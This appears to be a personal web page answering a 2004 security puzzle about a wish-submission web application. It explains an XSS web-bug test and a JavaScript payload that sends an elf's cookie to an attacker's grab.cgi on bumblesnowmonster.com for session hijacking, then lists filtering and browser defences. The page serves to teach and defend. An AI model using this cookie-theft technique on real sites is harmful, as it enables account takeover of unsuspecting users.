Who am I?
Where & When
Olde Style Page
Math Puzzles

By David Lancaster

Here's my answers:
1. Netcat....

Uh....on 2nd thought....
1. The first piece of text was a test to see if the application was vulnerable to Cross-site scripting (XSS), by using a web-bug. If the application was vulnerable, when an elf viewed this wish, their browser would attempt to display the image at "http://www.bumblesnowmonster.com/Sample.jpg", but the elf would not be aware of the attempt since the height and width were set to 0. Presumably the child would have access to the server's logs and could verify if the XSS test succeeded.

2. The 2nd piece of text is a javascript XSS exploit which is designed to grab the elf's cookie to the wish-submission/naughty-or-nice web application. When an elf opened the page containing this wish, their browser would run the javascript, which would attempt to call the cgi at "http://www.bumblesnowmonster.com/cgi-bin/grab.cgi" with the contents of the elf's cookie (document.cookie) as an argument, with grab.cgi most likely logging the cookie to a file. The child could then duplicate the elf's cookie, and login to the naughty-or-nice application and wreak havoc!

3. Mods to web Application:
Strip all HTML tags in wishes
Convert HTML tag delimiters (<, >) to equiv html codes (&gt;, &lt;)
Convert HTML tag delimiters (<,>) to other characters ([, ])
Setup a filter that permitted "normal" characters [a-zA-Z0-9,etc] and filters out everything else.
Hash the cookie with the elf's IP address, so it could only be re-used at that IP.

Mods to browser:
Firewall off elves to that they cannot access the internet at all.
Configure their browsers so that javascript cannot read cookies.

4. Disable parsing of HTML messages (use text version of multipart, or display HTML unparsed)
Disable javascript entirely in email.

Send me some e-mail

©Copyright 2004, Ed Skoudis